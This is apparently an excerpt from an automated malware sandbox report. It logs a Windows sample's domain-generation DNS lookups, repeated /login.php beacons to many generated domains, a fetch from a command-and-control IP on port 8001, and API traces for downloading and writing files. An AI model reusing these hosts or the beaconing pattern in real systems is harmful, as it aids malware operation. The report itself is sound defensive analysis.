    Source: unknownDNS traffic detected: query: gaqydeb.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxysun.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexyryl.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qegynuv.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: purylev.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lykylan.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vonyzac.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lymygyx.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowyzam.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocyquc.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qekynuq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gatyrez.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vonyket.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopypif.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pufygav.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: ganypeb.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzymev.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gahyvew.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujylog.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxyvoj.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygygin.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: gatykow.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qeqyreq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lykywid.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: volyjym.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lygynox.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedynul.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qebylug.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vopyzuc.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowyqoc.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vowycut.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qexynyp.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vocykem.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: vojygut.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: qedyqup.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: galyheh.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: pujybyq.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: lyxymin.com replaycode: Name error (3)
    Source: unknownDNS traffic detected: query: puzyguv.com replaycode: Name error (3)
    Source: unknown Network traffic detected: HTTP traffic on port 55362 -> 8001
    Source: unknown Network traffic detected: HTTP traffic on port 55378 -> 8001
    Source: unknown Network traffic detected: HTTP traffic on port 8001 -> 55378
    Source: unknown Network traffic detected: HTTP traffic on port 54058 -> 8001
    Source: unknown Network traffic detected: HTTP traffic on port 8001 -> 54058
    Source: unknown Network traffic detected: HTTP traffic on port 54058 -> 8001
    Source: unknown Network traffic detected: HTTP traffic on port 8001 -> 54058
    Source: unknown Network traffic detected: DNS query count 1003
    Source: C:\Windows\apppatch\svchost.exe Code function: 1_2_02CA4F80 IsUserAnAdmin,IsNetworkAlive,IsUserAnAdmin,DnsFlushResolverCache,CreateThread,memset,lstrcpynA,lstrcpynA,StrNCatA,StrNCatA,InternetCheckConnectionA,InternetCheckConnectionA,memset,lstrcpynA,StrNCatA,InternetCheckConnectionA,1_2_02CA4F80
    Source: global traffic TCP traffic: 192.168.2.4:55362 -> 47.103.150.18:8001
    Source: global traffic DNS traffic detected: number of DNS queries: 1003
    Source: Joe Sandbox View IP Address: 3.94.10.34
    Source: Joe Sandbox View IP Address: 15.197.240.20
    Source: Joe Sandbox View IP Address: 64.190.63.136
    Source: Joe Sandbox View ASN Name: AMAZON-AESUS
    Source: Joe Sandbox View ASN Name: TANDEMUS
    Source: Joe Sandbox View ASN Name: NBS11696US
    Source: Joe Sandbox View ASN Name: LIQUIDWEBUS
    Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: global traffic HTTP traffic detected: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyfyj.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww1.lysyfyj.comConnection: Keep-AliveCookie: sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyfyj.comCookie: sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupydeq.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: pupycag.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
    Source: global trafficHTTP traffic detected: GET /dh/147287063_35134.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 47.103.150.18:8001Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galynuh.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyciz.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qexyhuv.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.com
    Source: global trafficHTTP traffic detected: GET /login.php?sub1=20240908-1659-57ee-a0d6-041620171ba1 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1725778797.6242731
    Source: global trafficHTTP traffic detected: GET /login.php?subid1=20240908-1659-57be-bb39-c8c798adf2d1 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1725778797.8172407
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyhyg.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lygyvuj.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyhiz.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comCookie: __tad=1725778797.6242731
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comCookie: __tad=1725778797.8172407
    Source: global trafficHTTP traffic detected: GET /login.php?sub1=20240908-1700-25c9-bc2e-507729a41b57 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1725778797.6242731
    Source: global trafficHTTP traffic detected: GET /login.php?subid1=20240908-1700-25db-aecf-35c2eeb9e276 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1725778797.8172407
    Source: unknownTCP traffic detected without corresponding DNS query: 47.103.150.18
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CA4AB0 memset,GetProcessHeap,HeapAlloc,memset,memcpy,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,_snprintf,HttpAddRequestHeadersA,HttpSendRequestA,HttpQueryInfoA,CreateFileA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,memset,InternetReadFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetHandleInformation,CloseHandle,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,1_2_02CA4AB0
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyfyj.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww1.lysyfyj.comConnection: Keep-AliveCookie: sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761
    Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
    Source: global traffic
    DNS traffic detected: DNS query: gahyhob.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Sep 2024 06:58:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=93SruJii54aGJ3tSw%2F%2B4%2BmZDBr%2BiJZf3qVhxDobCgus%2Fou%2FJKuTnDSjN0AQRl%2FbzE34kN3Tn2DkcXSzJ%2BPqG79gHijB%2BQuA93KjA%2BOuXJdf6wWV8KunnqpMpUctJRQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bfd0d51ae511881-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 08 Sep 2024 06:58:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jp2kWtSqF%2Bo7hDgUGx0qZqD5g954kf%2BoZSLMj20kPejZYURwmaDNDjH%2BxAhyQSDovRGE7dcN3bwFOdjn%2BdXSgOdisNiSNTIpPMuDpcckxgymIrjHZGxWk4MDZNE%2BBA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8bfd0d5b9d4143f9-EWRalt-svc: h3=":443"; ma=86400
